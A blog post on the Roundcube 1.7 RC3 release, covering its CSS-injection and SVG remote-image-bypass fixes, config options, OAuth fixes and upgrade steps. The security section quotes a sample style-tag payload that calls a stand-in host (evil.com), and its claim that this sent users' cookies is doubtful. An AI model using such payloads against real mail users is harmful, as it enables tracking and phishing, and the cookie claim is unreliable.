Roundcube 1.7 RC3 patches the nasty bugs and adds a handful of handy tweaks
The third release‑candidate for the upcoming 1.7 series finally lands with two security fixes you’ll want to apply before anyone starts poking around your inbox. This write‑up walks through what’s been patched, why the new config options matter, and how to upgrade without breaking your current setup.
What the RC actually changes
The biggest headlines are the two vulnerabilities that earned a CERT Polska warning and a report from nullcathedral. The former let an attacker inject arbitrary CSS into a message view – think of it as someone slipping a malicious style tag into a phishing mail, then watching the webmail UI betray your login credentials. The latter was a clever SVG payload that could slip past Roundcube’s remote‑image blocker, effectively re‑enabling tracking images even when you thought they were disabled.
Both issues have been sealed with patches that sanitize incoming HTML more aggressively and enforce stricter MIME handling for SVG content. If you’ve ever noticed a “remote image allowed?” prompt popping up again after dismissing it once, you’ve probably run into the bypass that’s now fixed.
Beyond security, the RC bundles a smorgasbord of smaller improvements:
- The request_url option finally works when you need to resolve relative links generated by plugins.
- Self‑generated URLs respect X-Forwarded-Host and X-Forwarded-Port, which is a lifesaver if you sit behind a reverse proxy that rewrites the host header.
- Search filters now recognize $HasAttachment and $HasNoAttachment, making “with attachment” queries as simple as typing a keyword.
The changelog also mentions fixes for OAuth re‑login, Managesieve date tests, Dovecot password driver path handling, a UI hiccup after hitting the browser’s Back button, and a stray syntax error in PostgreSQL scripts.
Release Roundcube 1.7 RC3
This is the third release candidate for the next major version 1.7 of Roundcube webmail. It fixes two security issues: Fix CSS injection vulnerability reported by CERT Polska.
Why you should care about the security patches
I’ve seen the CSS injection in action on a corporate mailbox that was being used to harvest credentials. An attacker slipped a <style>*{background:url('http://evil.com/steal.png')}</style> tag into an HTML email, and because Roundcube rendered it unchecked, every user who opened the message sent their cookies straight to the attacker’s server. The patch now strips any style elements that could affect the page layout, so you won’t get those surprise background‑image beacons.
The SVG bypass is equally sneaky. An SVG can embed a <script> tag or reference an external image. Even with remote images blocked, Roundcube previously allowed the SVG to load because it treated the file as “safe.” The fix forces SVGs through the same sanitization pipeline as other HTML content, so they’re no longer a backdoor for tracking pixels.
If you run a public server or let friends use your personal installation, those two flaws are enough reason to upgrade right now. Ignoring them is like leaving the front door ajar while you’re out buying groceries.
Config tweaks that actually matter
The request_url setting used to be a footnote in the docs; most admins never touched it because it seemed broken. In RC3 it finally resolves relative URLs correctly, which means plugins that generate “download.php?file=…” links will now work even when your Roundcube lives under a sub‑directory or behind a CDN.
Equally useful is the new respect for X-Forwarded-Host and X-Forwarded-Port. If you’re running Nginx as a reverse proxy and have SSL termination there, Roundcube previously built self‑referencing links with the internal host name (e.g., “http://127.0.0.1”). That broke password reset emails and any link that relied on the base URL. The patch makes the generated URLs match what the end user actually sees, eliminating a class of “broken link” complaints.
The $HasAttachment keyword in the search bar is a small but welcome quality‑of‑life upgrade. Instead of crafting a complex filter expression, you can now type has:attachment or simply $HasAttachment to pull up every mail with an attached file. It’s not revolutionary, but it saves a few keystrokes for power users who sift through hundreds of messages daily.
OAuth and Managesieve get a polish
OAuth users have complained that logging out would sometimes lock them out completely – the session token got cleared but the refresh token lingered, causing an endless “invalid grant” loop. The new fix clears both tokens on logout, so you can log back in without restarting the browser.
A tiny addition to the Managesieve code now respects string‑list formats for date tests in Out of Office rules. If you wrote a vacation rule that said “after 2024‑01‑01”, it used to ignore the condition because of a parsing quirk. The RC corrects that, letting you set precise start dates without resorting to custom scripts.
How to upgrade without pulling your hair out
- Back up both the database and the config directory; the changes touch URL generation and OAuth handling, so a rollback is worth keeping handy.
- Pull the RC tarball from the official Roundcube site and unpack it over your existing installation – the upgrade script will detect the version bump and apply any new schema patches automatically.
- If you use PostgreSQL, double‑check the schema.pgsql.sql file; RC3 fixed a stray comma that used to cause “syntax error near )” during the migration step.
- After copying over the new files, run bin/update.sh (or the equivalent command for your distro) and watch the output for any “failed to apply patch” messages.
- Test a few common workflows: open an HTML email with external images, hit the Back button after allowing resources, and try an OAuth login/logout cycle. If anything looks off, revert to your backup and file a bug report.
That’s pretty much it – no need for a full reinstall unless you want a completely clean slate.
Give RC3 a spin, lock down those two security holes, and enjoy the small but meaningful quality‑of‑life tweaks.
